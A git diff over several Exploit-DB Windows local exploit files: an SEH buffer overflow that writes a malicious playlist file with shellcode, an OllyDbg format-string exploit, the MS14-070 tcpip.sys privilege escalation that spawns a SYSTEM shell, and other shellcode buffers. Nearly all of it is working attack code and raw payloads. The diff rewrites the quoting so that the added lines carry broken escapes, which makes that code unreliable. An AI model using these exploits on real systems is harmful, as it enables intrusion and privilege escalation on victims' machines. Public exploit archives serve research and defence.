diff --git a/platforms/windows/local/36837.rb b/platforms/windows/local/36837.rb
index 846bebfe5..2a15e9f0c 100755
--- a/platforms/windows/local/36837.rb
+++ b/platforms/windows/local/36837.rb
@@ -8,44 +8,44 @@
 # Exploit-db : http://www.exploit-db.com/author/?a=2986
 # Youtube : https://www.youtube.com/user/cutehack3r
 
-header = "[Playlist]\r\n"
-header << "NumberOfEntries=1\r\n"
-header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
-header << "Title1="
+header = \"[Playlist]\\r\\n\"
+header << \"NumberOfEntries=1\\r\\n\"
+header << \"File1=http://www.panix.com/web/faq/multimedia/sample.mp3\\r\\n\"
+header << \"Title1=\"
 
-nseh_longer = "\xeb\x1E\x90\x90"
-nseh_shorter = "\xeb\x06\x90\x90"
+nseh_longer = \"\\xeb\\x1E\\x90\\x90\"
+nseh_shorter = \"\\xeb\\x06\\x90\\x90\"
 seh = 0x72d119de #pop pop ret from msacm32.drv
-shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
-"\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
-"\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
-"\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
-"\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
-"\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
-"\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
-"\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
-"\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
-"\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
-"\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
-"\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
-"\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
-"\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
-"\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
-"\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
-"\x8e\x44\xd9"
+shell = \"\\xdd\\xc1\\xd9\\x74\\x24\\xf4\\xbb\\x2b\\x2b\\x88\\x37\\x5a\\x31\\xc9\" +
+\"\\xb1\\x33\\x83\\xea\\xfc\\x31\\x5a\\x13\\x03\\x71\\x38\\x6a\\xc2\\x79\" +
+\"\\xd6\\xe3\\x2d\\x81\\x27\\x94\\xa4\\x64\\x16\\x86\\xd3\\xed\\x0b\\x16\" +
+\"\\x97\\xa3\\xa7\\xdd\\xf5\\x57\\x33\\x93\\xd1\\x58\\xf4\\x1e\\x04\\x57\" +
+\"\\x05\\xaf\\x88\\x3b\\xc5\\xb1\\x74\\x41\\x1a\\x12\\x44\\x8a\\x6f\\x53\" +
+\"\\x81\\xf6\\x80\\x01\\x5a\\x7d\\x32\\xb6\\xef\\xc3\\x8f\\xb7\\x3f\\x48\" +
+\"\\xaf\\xcf\\x3a\\x8e\\x44\\x7a\\x44\\xde\\xf5\\xf1\\x0e\\xc6\\x7e\\x5d\" +
+\"\\xaf\\xf7\\x53\\xbd\\x93\\xbe\\xd8\\x76\\x67\\x41\\x09\\x47\\x88\\x70\" +
+\"\\x75\\x04\\xb7\\xbd\\x78\\x54\\xff\\x79\\x63\\x23\\x0b\\x7a\\x1e\\x34\" +
+\"\\xc8\\x01\\xc4\\xb1\\xcd\\xa1\\x8f\\x62\\x36\\x50\\x43\\xf4\\xbd\\x5e\" +
+\"\\x28\\x72\\x99\\x42\\xaf\\x57\\x91\\x7e\\x24\\x56\\x76\\xf7\\x7e\\x7d\" +
+\"\\x52\\x5c\\x24\\x1c\\xc3\\x38\\x8b\\x21\\x13\\xe4\\x74\\x84\\x5f\\x06\" +
+\"\\x60\\xbe\\x3d\\x4c\\x77\\x32\\x38\\x29\\x77\\x4c\\x43\\x19\\x10\\x7d\" +
+\"\\xc8\\xf6\\x67\\x82\\x1b\\xb3\\x98\\xc8\\x06\\x95\\x30\\x95\\xd2\\xa4\" +
+\"\\x5c\\x26\\x09\\xea\\x58\\xa5\\xb8\\x92\\x9e\\xb5\\xc8\\x97\\xdb\\x71\" +
+\"\\x20\\xe5\\x74\\x14\\x46\\x5a\\x74\\x3d\\x25\\x3d\\xe6\\xdd\\x84\\xd8\" +
+\"\\x8e\\x44\\xd9\"
 #1020 --> offset in local exploits 
-payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell 
-#380  or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
-payload_remote =  header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') +  shell 
+payload = header + \"A\" * 1020 + nseh_shorter + [seh].pack(\'V\') + shell 
+#380  or 404 (if itunes wasn\'t already loaded)--> offset in remote ones using the itms protocol.
+payload_remote =  header + \"A\" * 380 + nseh_longer + [seh].pack(\'V\') + \"A\" * 16 + nseh_shorter + [seh].pack(\'V\') +  shell 
 
 # when using as local exploit
-open('exploit.pls', 'w') { |f|
+open(\'exploit.pls\', \'w\') { |f|
   f.puts payload
 }
-puts('local file created')
+puts(\'local file created\')
 
 # place this in a web server and use the itms:// protocol to load it.
-open('exploit_remote.pls', 'w') { |f|
+open(\'exploit_remote.pls\', \'w\') { |f|
   f.puts payload_remote
 }
-puts('remote file created')
+puts(\'remote file created\')
diff --git a/platforms/windows/local/3757.txt b/platforms/windows/local/3757.txt
index d4eaba4d8..151ded008 100755
--- a/platforms/windows/local/3757.txt
+++ b/platforms/windows/local/3757.txt
@@ -25,15 +25,15 @@ You can use it for your AntiCrack tricks against vuln OllyDbg
 #include 
 #include 
 
-#define FORMAT_STRING       "%4602u"
+#define FORMAT_STRING       \"%4602u\"
 #define XOR_DWORD           0x02020202
 
 #ifdef __BORLANDC__
 #   pragma option -w-asc
 #   pragma option -w-eff
 #else
-#pragma comment(linker,"/ENTRY:WinMain") 
-#pragma comment(lib, "msvcrt.lib") 
+#pragma comment(linker,\"/ENTRY:WinMain\") 
+#pragma comment(lib, \"msvcrt.lib\") 
 #endif
 
 
@@ -43,22 +43,22 @@ You can use it for your AntiCrack tricks against vuln OllyDbg
 // because of bounds check on user-supplied data ,see below
 // char buffer[256];
 // snprintf(buffer,256,user_buffer);
-// buffer[255]= '\0';
+// buffer[255]= \'\\0\';
 char shellcode[] =
-	"\xEB\x0F\x58\x80\x30\x02\x40\x81\x38\x4F\x4C\x4C\x41\x75\xF4\xEB\x05"
-	"\xE8\xEC\xFF\xFF\xFF\x57\x89\xEE\x81\xEE\x0E\xEA\x02\x02\x02\x02\x5A"
-	"\x2F\x91\x15\x42\x02\x8B\x47\xF6\x68\x42\x07\x48\x1A\x42\x02\x52\x89"
-	"\x47\xF6\x07\xD7\x15\x42\x02\x52\x68\x02\xBA\x01\x01\x01\x01\xFD\xD2"
-	"\x68\x07\x89\x47\xF6\x07\x50\x1A\x42\x02\x52\xBA\x07\x07\x07\x07\xFD"
-	"\xD2\x68\x02\xBA\x06\x06\x06\x06\xFD\xD2\x89\xE7\x5F\xC1\x43\x76\x76"
-	"\x63\x61\x69\x22\x6B\x71\x22\x71\x77\x61\x61\x67\x71\x71\x64\x77\x6E"
-	"\x23\x08\x08\x55\x67\x22\x63\x70\x67\x22\x6B\x6C\x22\x76\x6A\x67\x22"
-	"\x72\x70\x6D\x61\x67\x71\x71\x22\x61\x6D\x6C\x76\x67\x7A\x76\x22\x6D"
-	"\x64\x22\x4D\x6E\x6E\x7B\x46\x60\x65\x2C\x67\x7A\x67\x08\x6C\x6D\x75"
-	"\x22\x75\x67\x22\x75\x6B\x6E\x6E\x22\x6E\x63\x77\x6C\x61\x6A\x22\x61"
-	"\x63\x6E\x61\x2C\x67\x7A\x67\x22\x2A\x75\x6B\x6C\x66\x6D\x75\x71\x22"
-	"\x61\x63\x6E\x61\x77\x6E\x63\x76\x6D\x70\x2B\x02\x4D\x6E\x6E\x7B\x46"
-	"\x60\x65\x02\x61\x63\x6E\x61\x02\x61\x63\x6E\x61\x02\x4F\x4C\x4C\x41";
+	\"\\xEB\\x0F\\x58\\x80\\x30\\x02\\x40\\x81\\x38\\x4F\\x4C\\x4C\\x41\\x75\\xF4\\xEB\\x05\"
+	\"\\xE8\\xEC\\xFF\\xFF\\xFF\\x57\\x89\\xEE\\x81\\xEE\\x0E\\xEA\\x02\\x02\\x02\\x02\\x5A\"
+	\"\\x2F\\x91\\x15\\x42\\x02\\x8B\\x47\\xF6\\x68\\x42\\x07\\x48\\x1A\\x42\\x02\\x52\\x89\"
+	\"\\x47\\xF6\\x07\\xD7\\x15\\x42\\x02\\x52\\x68\\x02\\xBA\\x01\\x01\\x01\\x01\\xFD\\xD2\"
+	\"\\x68\\x07\\x89\\x47\\xF6\\x07\\x50\\x1A\\x42\\x02\\x52\\xBA\\x07\\x07\\x07\\x07\\xFD\"
+	\"\\xD2\\x68\\x02\\xBA\\x06\\x06\\x06\\x06\\xFD\\xD2\\x89\\xE7\\x5F\\xC1\\x43\\x76\\x76\"
+	\"\\x63\\x61\\x69\\x22\\x6B\\x71\\x22\\x71\\x77\\x61\\x61\\x67\\x71\\x71\\x64\\x77\\x6E\"
+	\"\\x23\\x08\\x08\\x55\\x67\\x22\\x63\\x70\\x67\\x22\\x6B\\x6C\\x22\\x76\\x6A\\x67\\x22\"
+	\"\\x72\\x70\\x6D\\x61\\x67\\x71\\x71\\x22\\x61\\x6D\\x6C\\x76\\x67\\x7A\\x76\\x22\\x6D\"
+	\"\\x64\\x22\\x4D\\x6E\\x6E\\x7B\\x46\\x60\\x65\\x2C\\x67\\x7A\\x67\\x08\\x6C\\x6D\\x75\"
+	\"\\x22\\x75\\x67\\x22\\x75\\x6B\\x6E\\x6E\\x22\\x6E\\x63\\x77\\x6C\\x61\\x6A\\x22\\x61\"
+	\"\\x63\\x6E\\x61\\x2C\\x67\\x7A\\x67\\x22\\x2A\\x75\\x6B\\x6C\\x66\\x6D\\x75\\x71\\x22\"
+	\"\\x61\\x63\\x6E\\x61\\x77\\x6E\\x63\\x76\\x6D\\x70\\x2B\\x02\\x4D\\x6E\\x6E\\x7B\\x46\"
+	\"\\x60\\x65\\x02\\x61\\x63\\x6E\\x61\\x02\\x61\\x63\\x6E\\x61\\x02\\x4F\\x4C\\x4C\\x41\";
 
 DWORD SearchStream(
     const char *pvStream,
@@ -91,10 +91,10 @@ DWORD SearchStream(
 
 DWORD FindRetToEspAddress(VOID)
 {
-    HMODULE hModule = GetModuleHandle("kernel32.dll");
+    HMODULE hModule = GetModuleHandle(\"kernel32.dll\");
     DWORD dwEspRet;
-    char* pszCallEsp = "\xFF\xD4"; // CALL ESP
-    //char* pszJmpEsp  = "\xFF\xE4"; // JMP ESP
+    char* pszCallEsp = \"\\xFF\\xD4\"; // CALL ESP
+    //char* pszJmpEsp  = \"\\xFF\\xE4\"; // JMP ESP
 
     PIMAGE_DOS_HEADER pimage_dos_header;
     PIMAGE_NT_HEADERS pimage_nt_headers;
@@ -112,9 +112,9 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
     char* pszEvilBuffer;
     ULONG ulEvilBufSize;
 
-    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA")^XOR_DWORD;
-    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"WinExec")^XOR_DWORD;
-    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"ExitProcess")^XOR_DWORD;
+    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary(\"user32.dll\"),\"MessageBoxA\")^XOR_DWORD;
+    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle(\"kernel32.dll\"),\"WinExec\")^XOR_DWORD;
+    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle(\"kernel32.dll\"),\"ExitProcess\")^XOR_DWORD;
 
     DWORD dwRetAddr = FindRetToEspAddress();
 
diff --git a/platforms/windows/local/37755.c b/platforms/windows/local/37755.c
index 0016c4f40..6f6e4cb64 100755
--- a/platforms/windows/local/37755.c
+++ b/platforms/windows/local/37755.c
@@ -129,13 +129,13 @@ BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORM
         // Start the child process.
         return CreateProcess (
                 NULL,                                                           // No module name (use command line)
-                "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
+                \"c:\\\\windows\\\\system32\\\\cmd.exe /K cd c:\\\\windows\\\\system32\",   // Start cmd.exe
                 NULL,                                                           // Process handle not inheritable
                 NULL,                                                           // Thread handle not inheritable
                 TRUE,                                                           // Set handle inheritance to TRUE
                 0,                                                              // No creation flags
-                NULL,                                                           // Use parent's environment block
-                NULL,                                                           // Use parent's starting directory
+                NULL,                                                           // Use parent\'s environment block
+                NULL,                                                           // Use parent\'s starting directory
                 &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                 &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
         );
@@ -160,14 +160,14 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
         returnAllocMemValue1 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x28,
-                "\x87\xff\xff\x38",
+                \"\\x87\\xff\\xff\\x38\",
                 4,
                 NULL
         );
         returnAllocMemValue2 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x38,
-                "\x00\x00",
+                \"\\x00\\x00\",
                 2,
                 NULL
         );
@@ -181,7 +181,7 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
         returnAllocMemValue4 = WriteProcessMemory (
                 (HANDLE) 0xFFFFFFFF,
                 (LPVOID) 0x2b,
-                "\x00\x00",
+                \"\\x00\\x00\",
                 2,
                 NULL
         );
@@ -208,8 +208,8 @@ BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
 
 int main (void)
 {
-        fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
-        fprintf (stderr, "    [*] by Tomislav Paskalev\n");
+        fprintf (stderr, \"[*] MS14-070 (CVE-2014-4076) x86\\n\");
+        fprintf (stderr, \"    [*] by Tomislav Paskalev\\n\");
         fflush (stderr);
 
 
@@ -222,13 +222,13 @@ int main (void)
 
         if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
         {
-                fprintf (stderr, "[-] Creating a new process failed\n");
-                fprintf (stderr, "    [*] Error code   : %d\n", GetLastError());
+                fprintf (stderr, \"[-] Creating a new process failed\\n\");
+                fprintf (stderr, \"    [*] Error code   : %d\\n\", GetLastError());
                 fflush (stderr);
                 ExitProcess (1);
         }
 
-        fprintf (stderr, "[+] Created a new cmd.exe process\n");
+        fprintf (stderr, \"[+] Created a new cmd.exe process\\n\");
         fflush (stderr);
 
 
@@ -237,14 +237,14 @@ int main (void)
         ////////////////////////////////
 
         unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, "    [*] PID [dec]    :   %#8lu\n", (unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, "    [*] PID [hex]    : %#010x\n", (unsigned long) processInformation->dwProcessId);
-        fprintf (stderr, "    [*] PID [hex LE] : %#010x\n", pidLittleEndian);
+        fprintf (stderr, \"    [*] PID [dec]    :   %#8lu\\n\", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, \"    [*] PID [hex]    : %#010x\\n\", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, \"    [*] PID [hex LE] : %#010x\\n\", pidLittleEndian);
 
         /*four bytes of hex = 8 characters, plus NULL terminator*/
         unsigned char pidLittleEndianString[9];
 
-        sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);
+        sprintf (&pidLittleEndianString[0], \"%04x\", pidLittleEndian);
 
 
         ////////////////////////////////
@@ -252,15 +252,15 @@ int main (void)
         ////////////////////////////////
 
         unsigned char exploitBuffer[] =
-        "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
-        "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
+        \"\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\"
+        \"\\x22\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\";
         unsigned char shellcode[] =
-        "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
-        "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
-        "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
-        "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
-        "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
-        "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
+        \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\\x8B\\x40\\x38\\x50\\xBB\\x04\\x00\\x00\\x00\"
+        \"\\x8B\\x80\\x98\\x00\\x00\\x00\\x2D\\x98\\x00\\x00\\x00\\x39\\x98\\x94\\x00\\x00\"
+        \"\\x00\\x75\\xED\\x8B\\xB8\\xD8\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\\x41\\x41\"
+        \"\\x41\\x41\\x8B\\x80\\x98\\x00\\x00\\x00\\x2D\\x98\\x00\\x00\\x00\\x39\\x98\\x94\"
+        \"\\x00\\x00\\x00\\x75\\xED\\x89\\xB8\\xD8\\x00\\x00\\x00\\x61\\xBA\\x11\\x11\\x11\"
+        \"\\x11\\xB9\\x22\\x22\\x22\\x22\\xB8\\x3B\\x00\\x00\\x00\\x8E\\xE0\\x0F\\x35\\x00\";
 
         int counter;
         for (counter = 0; counter < 4; counter++)
@@ -269,17 +269,17 @@ int main (void)
                 shellcode[46 + counter] = strtol (buffer, NULL, 16);
         }
 
-        shellcode[77] = strtol ("39", NULL, 16);
-        shellcode[78] = strtol ("ff", NULL, 16);
-        shellcode[79] = strtol ("a2", NULL, 16);
-        shellcode[80] = strtol ("ba", NULL, 16);
+        shellcode[77] = strtol (\"39\", NULL, 16);
+        shellcode[78] = strtol (\"ff\", NULL, 16);
+        shellcode[79] = strtol (\"a2\", NULL, 16);
+        shellcode[80] = strtol (\"ba\", NULL, 16);
 
-        shellcode[82] = strtol ("0", NULL, 16);
-        shellcode[83] = strtol ("0", NULL, 16);
-        shellcode[84] = strtol ("0", NULL, 16);
-        shellcode[85] = strtol ("0", NULL, 16);
+        shellcode[82] = strtol (\"0\", NULL, 16);
+        shellcode[83] = strtol (\"0\", NULL, 16);
+        shellcode[84] = strtol (\"0\", NULL, 16);
+        shellcode[85] = strtol (\"0\", NULL, 16);
 
-        fprintf (stderr, "[+] Modified shellcode\n");
+        fprintf (stderr, \"[+] Modified shellcode\\n\");
         fflush (stderr);
 
 
@@ -288,7 +288,7 @@ int main (void)
         ////////////////////////////////
 
         HANDLE tcpIPDeviceHandle = CreateFileA (
-                "\\\\.\\Tcp",
+                \"\\\\\\\\.\\\\Tcp\",
                 0,
                 0,
                 NULL,
@@ -299,12 +299,12 @@ int main (void)
 
         if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
         {
-                printf ("[-] Opening TCP/IP I/O dev failed\n");
-                printf ("    [*] Error code   : %d\n", GetLastError());
+                printf (\"[-] Opening TCP/IP I/O dev failed\\n\");
+                printf (\"    [*] Error code   : %d\\n\", GetLastError());
                 ExitProcess (1);
         }
 
-        fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
+        fprintf (stderr, \"[+] Opened TCP/IP I/O device\\n\");
         fflush (stderr);
 
 
@@ -314,9 +314,9 @@ int main (void)
 
         FARPROC ZwAllocateVirtualMemory;
 
-        ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
+        ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle (\"NTDLL.DLL\"), \"ZwAllocateVirtualMemory\");
 
-        fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
+        fprintf (stderr, \"[*] ntdll.dll address: 0x%p\\n\", ZwAllocateVirtualMemory);
         fflush (stderr);
 
         NTSTATUS AllocMemReturnCode;
@@ -333,14 +333,14 @@ int main (void)
 
         if (AllocMemReturnCode != 0)
         {
-                printf ("[-] Allocating memory failed\n");
-                printf ("    [*] Error code   : %#X\n", AllocMemReturnCode);
+                printf (\"[-] Allocating memory failed\\n\");
+                printf (\"    [*] Error code   : %#X\\n\", AllocMemReturnCode);
                 ExitProcess (1);
         }
 
-        fprintf (stderr, "[+] Allocated memory\n");
-        fprintf (stderr, "    [*] BaseAddress  : 0x%p\n", BaseAddress);
-        fprintf (stderr, "    [*] RegionSize   : %#010x\n", RegionSize);
+        fprintf (stderr, \"[+] Allocated memory\\n\");
+        fprintf (stderr, \"    [*] BaseAddress  : 0x%p\\n\", BaseAddress);
+        fprintf (stderr, \"    [*] RegionSize   : %#010x\\n\", RegionSize);
         fflush (stderr);
 
 
@@ -348,19 +348,19 @@ int main (void)
         // WRITE EXPLOIT TO PROCESS MEM
         ////////////////////////////////
 
-        fprintf (stderr, "[*] Writing exploit...\n");
+        fprintf (stderr, \"[*] Writing exploit...\\n\");
         fflush (stderr);
 
         if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
         {
-                fprintf (stderr, "    [-] Failed to write to memory\n");
-                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
+                fprintf (stderr, \"    [-] Failed to write to memory\\n\");
+                fprintf (stderr, \"        [*] Err code : %d\\n\", GetLastError ());
                 fflush (stderr);
                 ExitProcess (1);
         }
         else
         {
-                fprintf (stderr, "    [+] done\n");
+                fprintf (stderr, \"    [+] done\\n\");
                 fflush (stderr);
         }
 
@@ -369,15 +369,15 @@ int main (void)
         // SEND EXPLOIT TO TCPIP.SYS
         ////////////////////////////////
 
-        fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
-        fprintf (stderr, "    [*] Parent proc hangs on exit\n");
+        fprintf (stderr, \"[*] Spawning SYSTEM shell...\\n\");
+        fprintf (stderr, \"    [*] Parent proc hangs on exit\\n\");
         fflush (stderr);
 
         FARPROC ZwDeviceIoControlFile;
         NTSTATUS DevIoCtrlReturnCode;
         ULONG ioStatus = 8;
 
-        ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
+        ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle (\"NTDLL.DLL\"), \"ZwDeviceIoControlFile\");
 
         DevIoCtrlReturnCode = ZwDeviceIoControlFile (
                 tcpIPDeviceHandle,
@@ -397,8 +397,8 @@ int main (void)
 
         if (DevIoCtrlReturnCode != 0)
         {
-                fprintf (stderr, "    [-] Exploit failed (->TCP/IP)\n");
-                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
+                fprintf (stderr, \"    [-] Exploit failed (->TCP/IP)\\n\");
+                fprintf (stderr, \"        [*] Err code : %d\\n\", GetLastError ());
                 fflush (stderr);
                 ExitProcess (1);
         }
@@ -411,7 +411,7 @@ int main (void)
         // Wait until child process exits.
         WaitForSingleObject (processInformation->hProcess, INFINITE);
 
-        fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
+        fprintf (stderr, \"[*] Exiting SYSTEM shell...\\n\");
         fflush (stderr);
 
         // Close process and thread handles.
diff --git a/platforms/windows/local/388.c b/platforms/windows/local/388.c
index 4b52313d2..2d1357a53 100755
--- a/platforms/windows/local/388.c
+++ b/platforms/windows/local/388.c
@@ -7,15 +7,15 @@
 #include 
 #include 
 
-#pragma comment(lib,"kernel32.lib")
+#pragma comment(lib,\"kernel32.lib\")
 
 void main(){
         unsigned char buffer[] =
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
-\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
-\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\x99\x40\x81\x38\x54\x55\x52\x4B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\
-\x12\x75\xCC\x12\x75\xF1\xFC\xE1\xFC\xB9\xF1\xFA\xF4\xFD\xB7\x14\xDC\x61\xC9\x21\x26\x17\x98\xE1\x66\x49\
-\x54\x55\x52\x4B\xCD%.1423x\x3E\x02\x4B\x02";
+\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\
+\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\
+\\x90\\x90\\x90\\x90\\xEB\\x0F\\x58\\x80\\x30\\x99\\x40\\x81\\x38\\x54\\x55\\x52\\x4B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\\
+\\x12\\x75\\xCC\\x12\\x75\\xF1\\xFC\\xE1\\xFC\\xB9\\xF1\\xFA\\xF4\\xFD\\xB7\\x14\\xDC\\x61\\xC9\\x21\\x26\\x17\\x98\\xE1\\x66\\x49\\
+\\x54\\x55\\x52\\x4B\\xCD%.1423x\\x3E\\x02\\x4B\\x02\";
 
         OutputDebugString(buffer);
 }
diff --git a/platforms/windows/local/3888.c b/platforms/windows/local/3888.c
index cbef57e4e..03a1e7b50 100755
--- a/platforms/windows/local/3888.c
+++ b/platforms/windows/local/3888.c
@@ -14,282 +14,282 @@
 #include 
 
 char RAS[]=
-"\x59\xa6\x6a\x95\x00\x00\x01\xfd\x00\x00\x01\xb6\x00\x00\x00\x08"
-"\x00\x03\x68\x94\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x03\x29"
-"\x1b\xff\xbc\xef\x73\xd9\x13\x00\x70\xf0\xcc\x8d\x99\x50\xf1\xf7"
-"\xac\x4d\xf0\xab\xe0\xec\xef\x2e\xe5\x8c\xef\xa6\x33\x8c\xc6\xfa"
-"\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1b\xff\xd7\x64\x8b\x7c\x41\x84\x00\x2d\x00\xd0\x99\x94\xe9\xad"
-"\xb4\x4b\xc9\x85\xe9\xe5\xb4\x80\x98\x8c\xe0\xc4\x33\xb6\xd5\xf7"
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
